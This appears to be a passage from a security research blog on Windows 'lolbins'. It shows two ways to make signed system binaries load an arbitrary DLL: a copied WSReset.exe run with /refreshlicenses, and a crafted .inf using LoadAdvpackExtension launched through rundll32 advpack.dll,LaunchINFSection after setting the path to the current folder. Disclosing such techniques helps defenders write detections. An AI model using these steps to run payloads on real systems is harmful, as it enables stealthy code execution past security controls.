The wsreset.exe program is a known lolbin, but it has a lot more to offer than is currently known.
When it is invoked with a command line argument /refreshlicenses it loads a licensemanagerapi.dll library from a current path, so copying c:\windows\System32\WSReset.exe file to a different folder, dropping a payload into licensemanagerapi.dll file, and then launching that copy of WSReset.exe with a /refreshlicenses command line argument will load the payload:
Yes, yet another oldie with a secret…
The .inf files are as old as Windows itself, and their internal structure has been covered by many, and over at least last two decades.
So, what’s new?
Well…
Ever heard of LoadAdvpackExtension ?
This simple .inf file demonstrates how to use it to load a DLL of your choice:
[version]
signature=”$CHICAGO$”
AdvancedINF=2.5,”test”[DefaultInstall]
Patching=1
LoadAdvpackExtension=test64.dll
To launch it, you need to do the following:
Place the above .inf file in c:\test\test.inf
Place test64.dll in c:\test
Go to terminal: cmd.exe
Run: set path=.
Run: c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection c:\test\test.inf,,1,
We change the PATH to make sure our test64.dll is found in a current directory, and then loaded:
